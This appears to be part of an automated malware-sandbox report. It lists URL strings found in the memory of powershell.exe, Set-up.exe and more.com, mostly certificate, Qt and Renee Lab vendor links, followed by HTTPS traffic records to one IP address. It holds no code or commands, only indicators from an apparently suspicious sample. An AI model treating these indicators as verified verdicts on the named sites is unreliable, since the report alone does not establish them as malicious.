Source: powershell.exe, 00000000.00000002.1921287558.000001F944CAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: powershell.exe, 00000000.00000002.1921287558.000001F944CAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000000.00000002.1921287558.000001F942D39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Set-up.exe, 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://qt.digia.com/
Source: Set-up.exe, 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://qt.digia.com/product/licensing
Source: powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0A
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: powershell.exe, 00000000.00000002.1921287558.000001F942D39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.1921287558.000001F942B11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1921287558.000001F942D39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://subca.ocsp-certum.com01
Source: powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://subca.ocsp-certum.com02
Source: powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://subca.ocsp-certum.com05
Source: Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://support.reneelab.com/anonymous_requests/new
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://support.reneelab.com/anonymous_requests/newstore/buy-renee-passnowentrare-nel-bios.htmlItalia
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: Set-up.exe, 00000003.00000002.1986792279.000000006F829000.00000002.00000001.01000000.0000000D.sdmp, Set-up.exe, 00000008.00000002.2095007049.000000006F829000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://trolltech.com/xml/features/report-start-end-entity
Source: Set-up.exe, 00000003.00000002.1986792279.000000006F829000.00000002.00000001.01000000.0000000D.sdmp, Set-up.exe, 00000008.00000002.2095007049.000000006F829000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://trolltech.com/xml/features/report-start-end-entityUnknown
Source: Set-up.exe, 00000003.00000002.1986792279.000000006F829000.00000002.00000001.01000000.0000000D.sdmp, Set-up.exe, 00000008.00000002.2095007049.000000006F829000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://trolltech.com/xml/features/report-whitespace-only-CharData
Source: Set-up.exe, 00000003.00000002.1986792279.000000006F829000.00000002.00000001.01000000.0000000D.sdmp, Set-up.exe, 00000008.00000002.2095007049.000000006F829000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://trolltech.com/xml/features/report-whitespace-only-CharDatahttp://xml.org/sax/features/namespa
Source: powershell.exe, 00000000.00000002.1921287558.000001F942D39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.certum.pl/CPS0
Source: powershell.exe, 00000000.00000002.1921287558.000001F944CAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.google-analytics.com/collect
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.00000000051D9000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003813000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: Set-up.exe, 00000003.00000002.1986587085.000000006F009000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://www.phreedom.org/md5)
Source: Set-up.exe, 00000003.00000002.1986587085.000000006F009000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0D
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.reneelab.biz/
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.reneelab.biz/redefinir-senha-de-admin-logon-windows.htmlhttp://support.reneelab.com/anony
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.reneelab.cc/
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.reneelab.com.cn/
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.reneelab.com.cn/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newst
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.reneelab.com/
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.reneelab.com/product-land-188.htmlhttp://support.reneelab.com/anonymous_requests/newstore
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.reneelab.de/
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.reneelab.de/product-land-237.htmlhttp://support.reneelab.com/anonymous_requests/newstore/
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.reneelab.es/
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.reneelab.es/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newstore/
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.reneelab.fr/
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.reneelab.it/
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.reneelab.it/reimpostare-passwordi-di-windows-login.html
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.reneelab.jp/
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.reneelab.jp/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstore/
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.reneelab.kr/
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.reneelab.net/
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.reneelab.net//reset-windows-password.htmlhttp://support.reneelab.com/anonymous_requests/n
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.reneelab.pl/
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.reneelab.pl/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newpurcha
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.reneelab.ru/
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.trialpay.com/productpage/?c=3016dc6&tid=6rpipbo
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
Source: Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll1.2.6
Source: Set-up.exe, 00000003.00000002.1986792279.000000006F829000.00000002.00000001.01000000.0000000D.sdmp, Set-up.exe, 00000008.00000002.2095007049.000000006F829000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: Set-up.exe, 00000003.00000002.1986792279.000000006F829000.00000002.00000001.01000000.0000000D.sdmp, Set-up.exe, 00000008.00000002.2095007049.000000006F829000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://xml.org/sax/features/namespaces
Source: powershell.exe, 00000000.00000002.1921287558.000001F942B11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1921287558.000001F942D39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://downloads.reneelab.com.cn/download_api.php
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://downloads.reneelab.com.cn/passnow/passnow_
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://downloads.reneelab.com/download_api.php
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://downloads.reneelab.com/download_api.phphttps://downloads.reneelab.com.cn/download_api.php?ac
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://downloads.reneelab.com/passnow/passnow_
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://downloads.reneelab.com/passnow/passnow_cnhttps://downloads.reneelab.com.cn/passnow/passnow_x
Source: powershell.exe, 00000000.00000002.1921287558.000001F942D39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.certum.pl/CPS0
Source: Set-up.exe, 00000003.00000002.1981077927.0000000003204000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088488029.0000000003744000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.c
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.reneelab.com
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.reneelab.comwww.reneelab.comhttp://https://0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 172.67.129.193:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.193:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.193:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.193:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.193:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.193:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.193:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.193:443 -> 192.168.2.4:49743 version: TLS 1.2
